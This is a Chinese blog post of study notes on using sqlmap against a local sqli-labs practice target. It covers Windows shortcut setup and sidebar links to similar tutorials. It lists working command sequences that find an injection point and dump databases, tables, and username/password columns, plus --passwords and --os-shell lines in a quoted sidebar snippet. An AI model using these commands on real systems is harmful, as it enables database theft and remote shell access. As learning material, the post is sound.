网络安全学习笔记——SalMap爆破&添加快捷方式

已于 2023-11-04 16:12:50 修改
阅读量438 收藏
点赞数
文章标签: 学习 笔记
于 2023-08-05 21:32:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72324806/article/details/132124921
版权

SqlMap的使用

SqlMap是SQLMap注入的神器,但是SqlMap只能跑一些过滤不太严格的注入,也可以使用Python编写的脚本跑
SqlMap使用

本机先装好Python环境,打开sqlmap下的cmd,在cmd的对话框输入python sqlmap.py 启动SqlMap,出现以下界面就说明sqlmap能正常使用,可以在网上找教程,把sqlmap做成一个链接放在桌面,方便后续直接使用在Windows桌面创建sqlmap快捷方式

注入成功,第一个是布尔盲注,第二个是错误注入,第三个是时间盲注,注入成功之后也会在本地形成一个文件缓存,即 C:\Users\Conpere\AppData\Local\sqlmap\output\192.168.165.98

语法应用

    sqlmap语法
    首先确定注入点——实战中的注入点就是用户和数据段进行交互的地方,根据参数判断
     
    -u 给sqlmap直接传入一个url是跑不出来注入的,因为它不知道此时的参数是什么,如
    python sqlmap.py -u http://192.168.165.98/sqlilabs/Less-5/
    要给它后面加参数,才能提供注入点,方便工具去查找注入,如
    python sqlmap.py -u http://192.168.165.98/sqlilabs/Less-5/?id=1  
    传递的参数要是对方服务器里实际存在的,而且是可以注入的参数
  

SqlMap爆破

    python sqlmap.py -u http://192.168.165.98/sqlilabs/Less-5/?id=1 --加参数
     
    --users         爆出sql的所有用户
    --passwords     爆出数据库账户与密码  一般不会直接读出账号密码,不建议使用
     
     
     
    --dbs           可以爆出该MySQL中的所有数据库的名字
    --current-db    爆出当前使用的数据库
    --current-user  爆出当前数据库使用账户
    --tables        爆出所有的表
     
    1.-D [数据库名] --tables
    2.-D [数据库名] -T [表名] --columns
    3.-D [数据库名] -T [表名] -C"username,realname,password" --dump
     
     
    MySql爆破
     
    第一步  寻找是否存在sql注入点
    python sqlmap.py -u "http://192.168.165.98/sqlilabs/Less-5/?id=1"
     
    第二步  查询当前sql库
    python sqlmap.py -u "http://192.168.165.98/sqlilabs/Less-5/?id=1" --current-db
     
    第三步  脱指定库的所有表
    python sqlmap.py -u "http://192.168.165.98/sqlilabs/Less-5/?id=1" -D security --tables
     
    第四步  爆指定库,指定表的所有字段
    python sqlmap.py -u "http://192.168.165.98/sqlilabs/Less-5/?id=1" -D security -T users --columns
     
    第五步  爆指定库,指定表,指定字段的所有值
    python sqlmap.py -u "http://192.168.165.98/sqlilabs/Less-5/?id=1" -D security -T users -C "username,password" --dump
     
    --dump 爆出列表中指定列的内容
     
     
     
    SqlMap的万能用法——可用于跑post数据包(Burp和SqlMap的联动)
     
    1.拿Burp抓取post传输的,要测试sql注入的网页的包,在抓包界面右键,save item 保存文件
     
    2.打开SqlMap python sqlmap.py -r +文件的存储地址
     
    此时可以判断出来该网站是否存在sql注入点,如果有的话,还会显示相应的方式,如盲注,联合注入等
    再重复上述第二步~第五步即可

SqlMap添加快捷方式

python在cmd显示不是内部或外部命令,以及python貌似正常,但是pip不正常时——在系统变量里重新设置或添加path变量,添加内容为python的安装路径,精确到.ex

sqlmap损坏时,在官网重新下载一个文件,放到电脑里,根据在Windows桌面创建sqlmap快捷方式_一只咸鱼猫的博客-CSDN博客重新设置一遍就好了

  1. 在桌面上右键选择新建,在选择快捷方式,进入创建快捷方式页面
  2. 在创建快捷方式页面,请键入对象位置输入cmd,点击下一步
  3. 在键入该快捷方式的名称中输入,点击完成,桌面上就有个sqlmap的快捷方式
  4. 点击刚刚新增好的sqlmap快捷方式,右键属性,进入属性的快捷方式页面,把快捷方式页面上的起始位置替换成sqlmap的目录,点击应用
  5. 双击快捷方式,就可以启用sqlmap了
Nosery
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqlmap工具学习
m0_70483044的博客
07-20 602
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。是sql注入方面一个强大的工具!...
sqlmap工具的使用 (超详细附工具版)_python sqlmap,2024最新网络安全面经分享
最新发布
2301_79098082的博客
04-04 920
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
sqlmap及其python依赖环境的安装
yk2909438315的博客
04-08 1959
由于环境的不同,安装过程中可能会遇到各种各样的问题,不用慌,先根据错误提示搜索,多试一下。因为sqlmap是用python语言编写的,所以需要先安装python环境。因为只能在sqlmap目录下使用命令,为了方便在任何地方使用,添加环境变量。只需要双击这个快捷方式,就可以进入sqlmap路径使用sqlmap命令。这时候就可以在任何地方使用sqlmap命令,也不需要带py后缀了。如果sqlmap.py不行,就用python sqlmap.py。如果是win10,编辑Path的时候是新建变量,不需要分号分隔。
salmap通关sql-labs学习笔记
qq_43641876的博客
11-19 563
sql注入学习笔记输出1
SQLMAP工具 详细使用方法
HAKUNAMATATATTA的博客
11-15 3313
SQLMAP 是一个开源的渗透测试工具,可以用来自动化的检测,利用 SQL 注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
TQ335x学习笔记——Nand&&网卡驱动移植
07-21
本文章是关于Nand&&网卡驱动移植的过程。
AI学习笔记——卷积神经网络(CNN)
02-24
上篇文章简单地地介绍了神经网络和深度学习,在神经网络中,每一层的每个神经元都与下一层的每个神经元相连(如下图),这种连接关系叫全连接(FullConnected)。如果以图像识别为例,输入就是是每个像素点,那么每一...
Solidworks学习笔记——随形变化.docx
07-13
Solidworks学习笔记——随形变化.docxSolidworks学习笔记——随形变化.docxSolidworks学习笔记——随形变化.docxSolidworks学习笔记——随形变化.docxSolidworks学习笔记——随形变化.docxSolidworks学习笔记——...
Python学习笔记——csv/excel文件读写&保存
12-21
工具包准备和设置检查csv文件读写和保存csv文件读写csv文件保存Excel工作表文件读写和保存excel文件读写excel文件保存总结附录代码 工具包准备和设置检查 相关工具包导入: 默认路径检查: 自定义路径: ...
Sqlmap入门爆库、爆表、爆字段、爆记录
weixin_56306210的博客
10-31 2029
Sqlmap爆库、爆表、爆字段、爆记录
sqlmap.py 脚本 sqlmap-master.zip
10-16
sqlmap的脚本,解压后可直接运行 列几个基本命令 ./sqlmap.py –h //查看帮助信息 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” //get注入 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --data “DATA”//post注入 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --cookie “COOKIE”//修改请求时的cookie ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --dbs //列数据库 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-users //列用户 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-passwords //获取密码hash ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-tables -D DB_NAME //列DB_NAME的表 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-columns –T TB_NAME -D DB_NAME //读取TB_NAME中的列 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell //取得一个shell
salmap测试工具
07-13
sqlmap工具,是针对链接地址中存在的漏洞,进行分布式爆破测试,检测出存在的漏洞!进行针对性的修改
sqlmap工具
m0_57485346的博客
03-14 779
sqlmap
史上最详细的sqlmap使用教程
热门推荐
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmap的安装和使用
XL5L7的博客
04-20 2983
sqlmap安装 sqlmap安装包 链接:https://pan.baidu.com/s/1bzR7IC6tSUgZ0bdmAxvk5g 提取码:0wc5 sqlmap命令大全 链接:https://pan.baidu.com/s/1dFWS2esURBBIH6WIhG8bgA 提取码:dltg 在安装sqlmap之前要先安装python环境 python安装包 链接:https://pan.baidu.com/s/1tifkYDC2KIVqxGEOhbs3ug 提取码:e0n5 安装好python环境之
获取快捷方式的文件路径
weixin_33816611的博客
10-29 248
#include <shlobj.h> bool ReadShortcut(LPWSTR lpwLnkFile, LPSTR lpDescFile) { bool bReturn = true; IShellLink *pShellLink; if(bReturn) { bReturn = (CoInitia...
windows10安装sqlmap与简单配置
awmd39947的博客
09-14 998
一.获取sqlmap压缩包:   注意:安装sqlmap之前,先确认已有python2.x环境   获取sqlmap压缩包并解压   下载地址:http://sqlmap.org/ 二.将解压缩的文件放在python2.x的安装目录下并重命名为sqlmap: 三.桌面点击鼠标右键,新建->快捷方式 选择cmd.exe路径,如下图: 命名快捷方式sqlmap,...
cda备考学习学习笔记——基础知识篇(二)
09-18
cda备考学习学习笔记——基础知识篇(二)主要涉及了计算机科学与技术领域的基本概念和知识。 首先,它介绍了计算机网络的基础知识。网络是将多台计算机通过通信链路连接起来,使它们能够相互通信和共享资源的系统。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Nosery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值